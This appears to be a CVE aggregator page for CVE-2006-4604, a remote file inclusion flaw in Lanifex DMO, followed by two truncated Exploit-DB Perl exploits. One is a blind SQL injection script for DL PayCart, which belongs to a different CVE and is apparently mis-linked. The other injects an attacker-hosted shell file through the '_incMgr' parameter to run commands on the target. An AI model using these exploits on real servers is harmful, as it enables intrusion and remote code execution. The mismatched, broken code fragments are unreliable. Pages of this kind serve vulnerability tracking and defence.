CVE-2006-4604
Published 2006-09-07
Priority P345 high 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.43% (82.2th percentile)
PHP remote file inclusion vulnerability in LFXlib/access_manager.php in Lanifex Database of Managed Objects (DMO) 2.3 Beta and earlier allows remote attackers to execute arbitrary PHP code via the _incMgr parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lanifex | lanifex | <= 2.3_beta | — |
| lanifex | lanifex | — | — |
No detection rules found.
Exploit-DB
DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
exploitdb·2007-08-28
CVE-2007-4604 DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
---
```perl
#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;
if ($res !~ /n
```
Exploit-DB
Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4604 Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion
---
```perl
#!/usr/bin/perl
use LWP::UserAgent;
#/*
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- DMO: Lanifex Database of Managed Objects
#
# perl exploit.pl http://site.com/[DMO_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
#
$sciezka = $ARGV[0];
$sciezkacmd = $ARGV[1];
$komenda = $ARGV[2];
if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$sciezka.'LFXlib/access_manager.php?_incMgr='.$sciezkacmd.'?&'.$komenda.'
```
No writeups or analysis indexed.